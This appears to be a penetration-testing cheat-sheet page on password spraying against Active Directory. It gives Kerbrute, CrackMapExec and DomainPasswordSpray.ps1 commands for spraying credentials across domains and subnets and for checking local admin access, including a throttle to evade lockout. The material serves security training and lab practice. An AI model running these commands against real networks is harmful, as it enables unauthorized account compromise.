Password Spraying

Password Spraying from Linux

Using Kerbrute

dollarboysushil@kali[dbs]$ kerbrute passwordspray -d marvel.local --dc 192.168.1.1 users_list.txt P@ssw0rd

Using Crackmapexec

dollarboysushil@kali[dbs]$ sudo crackmapexec smb 192.168.1.1 -u users_list.txt -p --continue-on-success

Local Admin Spraying with CrackMapExec

Local admin spraying is a technique used to check if a given set of credentials has local administrator access on multiple machines in a network.

CrackMapExec Local Admin Check
- Command:
  crackmapexec smb {IP-Range} -u {Username} -p {Password} --local-auth
- Description: Checks if the provided username and password have local administrator privileges on the specified IP range. The --local-auth flag specifies that the provided credentials are local accounts on each target machine.
Using a List of Credentials
- Command:
  crackmapexec smb {IP-Range} -u {Usernames-File} -p {Passwords-File} --local-auth
- Description: Uses a file containing multiple usernames and passwords to spray against the specified IP range, checking for local administrator access.
Password Spraying with Known Username
- Command:
  crackmapexec smb {IP-Range} -u {Username} -p {Password-List} --local-auth
- Description: Performs password spraying using a known username and a list of passwords against the IP range to check if any of them provide local administrator access.
Specifying a Domain
- Command:
  crackmapexec smb {IP-Range} -d {Domain-Name} -u {Username} -p {Password} --local-auth
- Description: Checks for local admin access on machines within a specified domain using the provided credentials.
Additional Options
- --continue-on-success: Continue spraying even if successful credentials are found.
- --threads {Number}: Specify the number of threads for concurrent connections.

Example Commands

Basic Local Admin Check:

crackmapexec smb 192.168.1.0/24 -u admin -p Password123 --local-auth

Local Admin Spraying from Windows

Local admin spraying can also be performed on a Windows machine using PowerShell scripts such as DomainPasswordSpray.ps1. This script allows for password spraying across multiple machines within a domain to check for valid credentials.

Using DomainPasswordSpray.ps1
- Step 1: Import the PowerShell module.
  PS C:\htb> Import-Module .\DomainPasswordSpray.ps1
- Step 2: Invoke the password spraying command.
  PS C:\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
- Description: This command sprays the password "Welcome1" across the domain, logging any successful login attempts to the spray_success file. The -ErrorAction SilentlyContinue flag suppresses errors to keep the output clean.
Specifying Additional Parameters
- -UserList {Path}: Use a file containing a list of usernames to spray against.
- -Domain {Domain}: Specify the domain name if different from the default context.
- -Throttle {Milliseconds}: Add a delay between attempts to avoid account lockout policies.
- Example Command:
  PS C:\htb> Invoke-DomainPasswordSpray -UserList C:\users.txt -Password Welcome1 -Domain MYDOMAIN -OutFile spray_success -Throttle 500 -ErrorAction SilentlyContinue

Example Commands

Basic Password Spray:

PS C:\htb> Invoke-DomainPasswordSpray -Password Password123 -OutFile success_log.txt -ErrorAction SilentlyContinue

PreviousGathering Users & Password Policies NextCredentialed Enumeration From Linux

Last updated 1 year ago

hashtagPassword Spraying from Linux

hashtagUsing Kerbrute

hashtagUsing Crackmapexec

hashtagLocal Admin Spraying with CrackMapExec

hashtagExample Commands

hashtagLocal Admin Spraying from Windows

hashtagExample Commands

Password Spraying from Linux

Using Kerbrute

Using Crackmapexec

Local Admin Spraying with CrackMapExec

Example Commands

Local Admin Spraying from Windows

Example Commands